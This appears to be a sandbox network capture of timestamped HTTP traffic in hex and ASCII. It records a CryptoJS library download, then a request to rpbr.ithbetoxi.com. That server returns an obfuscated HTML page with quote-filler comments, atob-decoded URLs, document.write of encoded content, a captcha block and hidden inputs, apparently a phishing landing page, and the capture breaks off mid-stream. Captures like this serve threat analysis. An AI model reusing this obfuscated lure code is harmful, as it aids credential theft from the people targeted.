2024-10-30 15:05:31 UTC	958	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:31 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 511221 Expires: Mon, 20 Oct 2025 15:05:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mG27VyFi1RFMB0Cg1wfNvjo%2BM47QXC%2BYn%2BrITGLd4kKdgusY7v6Cd5By7ZPpJn39iPBzZPExOL0SDe0w1xmUKddZEUV6DaUGcLYcLvXQLkxPQWYEW9YFVqI98jqt7NYowuvkGcK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8dac4dd0be734773-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:31 UTC	411	IN	Data Raw: 33 39 37 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 3979!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b Data Ascii: [4]>>>0<wt[4]>>>0?1:0)\|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+oo,c=((4294901760&i)i\|0)+
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 Data Ascii: %42,a=s\|c;i[n>>>2]\|=a<<24-n%48,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r\|~e&i)+n+s;return(c<<o\|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i\|r&~i)+n+s;return(c<<o\|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
2024-10-30 15:05:31 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0\|t))\|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:31 UTC	655	OUT	GET /wtqllHS/ HTTP/1.1 Host: rpbr.ithbetoxi.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:32 UTC	1210	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DhPUv0anyfbLrS9T1qbCdkSRRAf8RUCr8znJ32qr3Lg9ThJbjEJQfMKXnE9p8KeQrsJuMp10FPD8sxRMzZQz2esIYXXJfFNnCLljjWQH3gmR4exOgb7Gsa9p21cTuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=307&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1564&delivery_rate=9193650&cwnd=251&unsent_bytes=0&cid=e9d01103bfb9a058&ts=170&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6ImJ3c2lMZFBpTGpKb3p0ZzNFN2E0WkE9PSIsInZhbHVlIjoiODZxK1d3cE9sY20vdk1kb3hLYklMY0RodURDYnNpWitleEJUa0tjeHVZeUJ6NjBtTldxcUpDMmtMcnhFRXVjRHNZcmthTzREc1FnWDJwbjVIMFBIelFnMFpZQ005cmpnZUNOaDZJSHBIMzVoRmhjZmttVURaZERYL3FDYWU3STIiLCJtYWMiOiIwMjJmYWRlY2NlMzY3NDBiOWE0YjI4NGI2NmIzYjI0YTA0NDdmODNkZjQ4NzhkZjQ1NGJjZjEyNzJjZjFiOWQxIiwidGFnIjoiIn0%3D; expires=Wed, 30-Oct-2024 17:05:32 GMT; Max-Age=7200; path=/; secure; samesite=none
2024-10-30 15:05:32 UTC	707	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 56 59 53 48 4a 4d 53 57 6f 72 52 6b 30 32 53 44 59 31 4d 44 46 4a 53 44 4a 33 59 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 6d 46 79 5a 57 6c 4a 63 30 6c 6d 63 57 4e 47 63 30 35 5a 4d 44 4d 35 4e 57 78 7a 52 56 70 48 52 57 77 34 55 31 45 72 56 56 52 4c 51 6c 52 4d 51 57 4e 47 54 43 39 73 53 7a 64 75 4d 45 39 36 56 56 68 68 4d 46 4a 77 59 31 56 45 4e 6a 64 4a 64 45 38 72 61 6a 4a 48 56 45 49 31 57 55 31 57 54 48 4a 76 56 54 68 47 55 45 67 77 59 55 78 6d 63 6e 5a 77 59 6d 70 6b 4f 55 74 52 52 53 39 74 61 46 68 7a 56 6b 38 32 61 6b 6c 71 5a 57 74 45 65 44 64 57 59 58 56 51 63 47 4d 77 63 6c 59 76 51 6e 42 33 63 33 46 46 5a 57 45 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjVYSHJMSWorRk02SDY1MDFJSDJ3Y0E9PSIsInZhbHVlIjoiZmFyZWlJc0lmcWNGc05ZMDM5NWxzRVpHRWw4U1ErVVRLQlRMQWNGTC9sSzduME96VVhhMFJwY1VENjdJdE8rajJHVEI1WU1WTHJvVThGUEgwYUxmcnZwYmpkOUtRRS9taFhzVk82aklqZWtEeDdWYXVQcGMwclYvQnB3c3FFZWE
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 34 37 35 62 0d 0a 3c 21 2d 2d 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 53 63 45 4a 79 4c 6d 6c 30 61 47 4a 6c 64 47 39 34 61 53 35 6a 62 32 30 76 64 33 52 78 62 47 78 49 55 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 Data Ascii: 475b... I find that the harder I work, the more luck I seem to have. --><script>/* I find that the harder I work, the more luck I seem to have. */if(atob("aHR0cHM6Ly9ScEJyLml0aGJldG94aS5jb20vd3RxbGxIUy8=") == "nomatch"){document.write(decodeU
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 51 6f 6a 63 45 52 74 51 6e 64 50 63 56 46 42 55 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 45 62 55 4a 33 54 33 46 52 51 56 45 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 44 42 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e Data Ascii: QojcERtQndPcVFBUSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BEbUJ3T3FRQVEuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNDBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1n
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 30 4b 49 43 41 67 49 44 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 45 74 4c 53 42 54 64 57 4e 6a 5a 58 4e 7a 49 47 6c 7a 49 47 5a 70 62 6d 52 70 62 6d 63 67 63 32 46 30 61 58 4e 6d 59 57 4e 30 61 57 39 75 49 47 6c 75 49 47 64 70 64 6d 6c 75 5a 79 42 68 49 47 78 70 64 48 52 73 5a 53 42 74 62 33 4a 6c 49 48 52 6f 59 57 34 67 65 57 39 31 49 48 52 68 61 32 55 75 49 43 30 74 50 67 6f 38 4c 32 68 6c 59 57 51 2b 44 51 6f 4e 43 6a 78 69 62 32 52 35 49 48 4e 30 65 57 78 6c 50 53 4a 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 Data Ascii: 0KICAgIDwvc2NyaXB0Pg0KPCEtLSBTdWNjZXNzIGlzIGZpbmRpbmcgc2F0aXNmYWN0aW9uIGluIGdpdmluZyBhIGxpdHRsZSBtb3JlIHRoYW4geW91IHRha2UuIC0tPgo8L2hlYWQ+DQoNCjxib2R5IHN0eWxlPSJmb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRka
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 33 61 47 56 79 5a 53 42 77 63 6d 56 77 59 58 4a 68 64 47 6c 76 62 69 42 68 62 6d 51 67 62 33 42 77 62 33 4a 30 64 57 35 70 64 48 6b 67 62 57 56 6c 64 43 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 Data Ascii: 9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iVW5rbm93biI+DQo8IS0tIDxkaXY+U3VjY2VzcyBpcyB3aGVyZSBwcmVwYXJhdGlvbiBhbmQgb3Bwb3J0dW5pdHkgbWVldC48L2Rpdj4gLS0+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 62 45 6c 43 63 57 78 61 65 54 56 6f 53 6e 6c 4f 56 30 70 6b 4d 45 6b 79 65 47 70 59 63 6d 68 56 4d 48 67 35 61 48 59 78 61 7a 67 7a 54 33 63 7a 62 56 5a 75 55 48 6c 6f 64 45 74 57 4c 6e 52 70 59 33 56 79 63 32 39 75 4c 6d 4e 76 62 53 39 71 62 6e 4e 30 63 6e 4e 7a 61 6e 42 31 65 47 68 69 65 6e 4a 79 62 32 56 78 64 48 52 75 61 57 70 50 65 48 52 44 51 31 46 56 61 45 5a 51 51 31 64 47 52 46 46 61 56 6b 78 51 56 30 52 46 55 45 46 4f 51 6c 5a 48 53 55 56 4d 57 56 42 4a 53 31 42 44 54 45 39 45 56 6b 39 42 4a 79 77 67 65 77 30 4b 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6b 64 46 56 43 49 73 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a Data Ascii: 